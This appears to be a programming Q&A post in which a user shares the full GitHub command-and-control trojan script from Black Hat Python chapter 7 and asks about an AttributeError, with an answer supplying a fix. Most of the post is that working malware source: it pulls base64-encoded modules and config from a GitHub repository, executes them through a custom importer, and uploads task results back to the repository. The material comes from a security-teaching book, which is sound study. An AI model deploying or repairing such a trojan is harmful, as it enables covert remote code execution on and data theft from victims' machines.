# what is this AttributeError: recurse? related black hat python chapter7 github command and control

Tags: python, linux, github, github-api

[My Development environment]

```
root@kali:~# python

Python 2.7.3 (default, Mar 14 2014, 11:57:14) 

[GCC 4.7.2] on linux2
```

[Reference Url](https://nostarch.com/download/BlackHatPython_ch07.pdf)

[This is example source code]

`git_trojan.py`

```
import json
import base64
import sys
import time
import imp
import random
import threading
import Queue
import os

from github3 import login

trojan_id = "abc"

trojan_config = "%s.json" % trojan_id
data_path     = "data/%s/" % trojan_id
trojan_modules= []

task_queue    = Queue.Queue()
configured    = False

class GitImporter(object):

    def __init__(self):

        self.current_module_code = ""


    def find_module(self,fullname,path=None):

        if configured:
            print("[*] Attempting to retrieve %s" % fullname)
            new_library = get_file_contents("modules/%s" % fullname)

            if new_library is not None:
                self.current_module_code = base64.b64decode(new_library)
                return self


        return None

    def load_module(self,name):

        module = imp.new_module(name)

        exec self.current_module_code in module.__dict__

        sys.modules[name] = module

        return module



def connect_to_github():

    gh = login(username="yourusername",password="password")

    repo = gh.repository("yourusername","chapter7")

    branch = repo.branch("master")    


    return gh,repo,branch


def get_file_contents(filepath):

    gh,repo,branch = connect_to_github()

    tree = branch.commit.commit.tree.recurse()

    for filename in tree.tree:

         if filepath in filename.path:
            print("[*] Found file %s" % filepath)

            blob = repo.blob(filename._json_data['sha'])

            return blob.content

    return None

def get_trojan_config():

    global configured

    config_json   = get_file_contents(trojan_config)
    config        = json.loads(base64.b64decode(config_json))
    configured    = True

    for task in config:

        if task['module'] not in sys.modules:

            exec("import %s" % task['module'])

    return config

def store_module_result(data):

    gh,repo,branch = connect_to_github()

    remote_path = "data/%s/%d.data" %(trojan_id,random.randint(1000,100000))

    repo.create_file(remote_path,"Commit message",base64.b64encode(data))

    return

def module_runner(module):

    task_queue.put(1)
    result = sys.modules[module].run()
    task_queue.get()

    # store the result in our repo
    store_module_result(result)

    return


# main trojan loop    
sys.meta_path = [GitImporter()]

while True:

    if task_queue.empty():

        config = get_trojan_config()

        for task in config:
            t = threading.Thread(target=module_runner,args(task['module'],))
            t.start()
            time.sleep(random.randint(1,10))

    time.sleep(random.randint(1000,10000))
```

[This is error]

```
Traceback (most recent call last):
  File "trojan.py", line 122, in <module>
     config = get_trojan_config()
  File "trojan.py", line 81, in get_trojan_config
    config_json   = get_file_contents(trojan_config)
  File "trojan.py", line 65, in get_file_contents
    tree = branch.commit.commit.tree.recurse()
   File "/usr/local/lib/python2.7/dist-packages/github3/models.py", line 58, 
 in __getattr__
     raise AttributeError(attribute)
AttributeError: recurse
```

How can i fix this error?

Comment: The exception is pretty clear that when your code does `tree = branch.commit.commit.tree.recurse()` it's messed up somehow, since `branch.commit.commit.tree` doesn't have a `recurse` method. I have no idea what that line is supposed to be doing, and reading the `github3` module's documentation has not helped at all (it has really bad docs).

Comment: Is there any way to replace recurse ()? or how to get and list all files from a github repositroy in new version github3.py( 0.9.3v,1.1.0v)?

Answer (score 6):

For some reason they remove the `recurse()` attribute in `CommitTree()` object .
you should change

```
tree = branch.commit.commit.tree.recurse()
```

to

```
tree = branch.commit.commit.tree.to_tree().recurse()
```

that should fix the problem